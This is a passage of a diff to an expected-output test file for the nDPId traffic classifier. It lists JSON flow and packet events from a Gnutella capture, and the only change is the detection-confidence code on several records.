00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2119,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":302,"flow_packet_id":3,"flow_last_seen":124065,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124065,"pkt":"UlQAEjUCCAAn5uVZCABFAABtOI8AAIAR8XkKAAIPubtKrXAJ0PEAWeogCGsxAoAKiW4WeGL5TjmTYEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} 00563{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":1,"flow_last_seen":124066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124066,"pkt":"UlQAEjUCCAAn5uVZCABFAABtpB8AAIAR69kKAAIPJo536nAJwkQAWcjqSEIxAiBrw4qXLe42xzCJ9UQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00757{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2120,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"38.142.119.234","src_port":28681,"dst_port":49732,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2121,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2121,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_packet_id":1,"flow_last_seen":124066,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124066,"pkt":"UlQAEjUCCAAn5uVZCABFAABtsCgAAIARfIsKAAIPGIHpPHAJThYAWZr\/PMAxAkVlEJdEiTyKQUzsekQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2121,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2121,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":341,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124066,"flow_last_seen":124066,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124066,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"24.129.233.60","src_port":28681,"dst_port":19990,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2123,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2123,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_packet_id":1,"flow_last_seen":124090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124090,"pkt":"UlQAEjUCCAAn5uVZCABFAABtt4sAAIAR+XsKAAIPYtAamnAJE4IAWYPzFGQxAgG2rIRjjgWOdH93UEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2123,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":342,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"98.208.26.154","src_port":28681,"dst_port":4994,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2124,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2124,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_packet_id":1,"flow_last_seen":124090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124090,"pkt":"UlQAEjUCCAAn5uVZCABFAABt2TsAAIARn8YKAAIPWdRbm3AJFEsAWd1KrbwxApZ9ZL+wNENsMFG4eUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2124,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2124,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":343,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"89.212.91.155","src_port":28681,"dst_port":5195,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_packet_id":1,"flow_last_seen":124090,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":124090,"pkt":"UlQAEjUCCAAn5uVZCABFAABtN+oAAIARg3wKAAIPzyaj5HAJGnoAWUl8GqIxAsDHb8ARC\/TCVyKtTkQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2125,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":344,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":124090,"flow_last_seen":124090,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":124090,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"207.38.163.228","src_port":28681,"dst_port":6778,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 01408{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2126,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":340,"flow_packet_id":2,"flow_last_seen":124181,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":769,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":769,"pkt_l4_len":735,"thread_ts_msec":124181,"pkt":"CAAn5uVZUlQAEjUCCABFAALzBkkAAEARxyomjnfqCgACD8JEcAkC3z99SEIxAiBrw4qXLe42xzCJ9UQAAMACAAAGR1RLRwAAjVz9Bf0jf1LZ5zMd\/xsbFCoGHdIEJo536sJEAQAAAAT9X3JyFEdUS0cAAIQFsf+Bv2njsZMOcK5XBzk5Qq3rBN3GzcRRKkdUS0cAAIPPdMtTw3ywAQrcKHskULaFt8T9BFd7NurTckdUS0cAAIBDDfCNVDqFgBWTNBe\/R1a2V7AXBLm7Sq3Q8VdTSFIAAIsML3baZ9qjEzov01XuwUWPp8CvBBiB6TxOFldTSFIAAIgInuBYn2DWNYTpgSOhE3nGOSSqBGLQGpoTgldTSFIAAJMpLUy99S6l5+o3G\/7HZbY0zUPGBFnUW5sUS1NOT1cAAJJLJdecP9uDvZhuUeP7MwcedtuWBM8mo+QaekdUS0cAAJ6Xxzbx1oA8a67zMFTEYzHds+ukBEziVWkYyldTSFIAAJ7Bez1ZQQgPxovuLAykgS8CMrDdBLAKqQox\/0dUS0cAAJp\/6ofTpH0Z7c9sfONgy\/6jjg5ZBFTFYV4FUFdTSFIAAJgFqYyWS9v2Yq4KyYrmzTVJWc5SBGP6\/WMuK0dUS0cAAKZeyrvsa5mvejLQ38QnOIQ2zbdtBGQB54rc7ldTSFIAAKQeYlqSZYffwoHRlw8bFrfmBFSvBFQcNeGvO0dUS0cAAK10JPaTOb0hgYkPVi8cpzY7gtJoBFx1+WIan1dTSFIAAKr7G8iP9T\/W+jUmPMkpEJiqR57KBMvcaRtLPEdUS0cAALd6AZ7svQKtiRxAHRTzpxSemu\/LBNXlb+ATDEdUS0cAALSr6ArQaneMzMJ81PWuqjO12gqLBLV2NdR1LkdUS0cAALNy1PV19iuZm7NzjEzMA6wUOO22BFJALAsFSEdUS0cAALFbZ+HgSIrho0RaGRNTd1qTgMZFBC0fmHBo40dUS0cAAL1cZVAaZZhJTOPlkpw6jfT8aYRtBD\/kr6kHkA=="} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":126831,"flow_last_seen":126831,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":126831,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00456{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2164,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":1,"flow_last_seen":126831,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":126831,"pkt":"UlQAEjUCCAAn5uVZCABFAAA0bCBAAIAGmjkKAAIPRXai5cSatzq0d6IdAAAAAIAC+vCtSgAAAgQFtAEDAwgBAQQC"} 00451{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2165,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":2,"flow_last_seen":126943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":126943,"pkt":"CAAn5uVZUlQAEjUCCABFAAAsBmMAAEAGf\/9FdqLlCgACD7c6xJoBCaABtHeiHmAS\/\/8wNgAAAgQFtA=="} 00440{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2166,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_packet_id":3,"flow_last_seen":126943,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":126943,"pkt":"UlQAEjUCCAAn5uVZCABFAAAobCFAAIAGmkQKAAIPRXai5cSatzq0d6IeAQmgAlAQ+vBNAgAA"} -00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2167,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":126831,"flow_last_seen":126944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":513,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":126944,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00871{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2167,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":345,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":126831,"flow_last_seen":126944,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":513,"flow_tot_l4_payload_len":513,"flow_avg_l4_payload_len":128,"midstream":0,"thread_ts_msec":126944,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"69.118.162.229","src_port":50330,"dst_port":46906,"l4_proto":"tcp","ndpi": {"flow_risk": {"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}},"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_packet_id":1,"flow_last_seen":129174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129174,"pkt":"UlQAEjUCCAAn5uVZCABFAABtuPMAAIAR0zIKAAIPTOJVaXAJGMoAWVtEeBkxArN0R\/zFhR7fMHiNqUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00755{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2197,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":346,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"76.226.85.105","src_port":28681,"dst_port":6346,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00562{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00536{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_packet_id":1,"flow_last_seen":129174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129174,"pkt":"UlQAEjUCCAAn5uVZCABFAABt3TUAAIAR+CYKAAIPsAqpCnAJMf8AWSFl+80xAiQL9J1qTYJox\/q2yUQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} +00756{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2198,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":347,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"176.10.169.10","src_port":28681,"dst_port":12799,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"6":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 00560{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00535{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_packet_id":1,"flow_last_seen":129174,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":123,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":123,"pkt_l4_len":89,"thread_ts_msec":129174,"pkt":"UlQAEjUCCAAn5uVZCABFAABttG4AAIARw98KAAIPVMVhXnAJBVAAWURxEsIxAlakBl2ebhXyeemOeEQAADoAAAAFR1RLRwAAKJ0KjQbe\/8gmPDOJfCyRef2Eq2EEXS\/iNXAJAQEAAIek2ZxoyMuuDPvZIwnux4CwuAqS"} -00754{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":2199,"source":"gnutella.pcap","alias":"nDPId-test","flow_id":348,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":129174,"flow_last_seen":129174,"flow_idle_time":200000,"flow_min_l4_payload_len":81,"flow_max_l4_payload_len":81,"flow_tot_l4_payload_len":81,"flow_avg_l4_payload_len":81,"midstream":0,"thread_ts_msec":129174,"l3_proto":"ip4","src_ip":"10.0.2.15","dst_ip":"84.197.97.94","src_port":28681,"dst_port":1360,"l4_proto":"udp","ndpi": {"flow_risk": {"22": {"risk":"Unsafe Protocol","severity":"Low","risk_score": {"total":750,"client":575,"server":175}}},"confidence": {"4":"DPI"},"proto":"Gnutella","breed":"Potentially Dangerous","category":"Download"}} 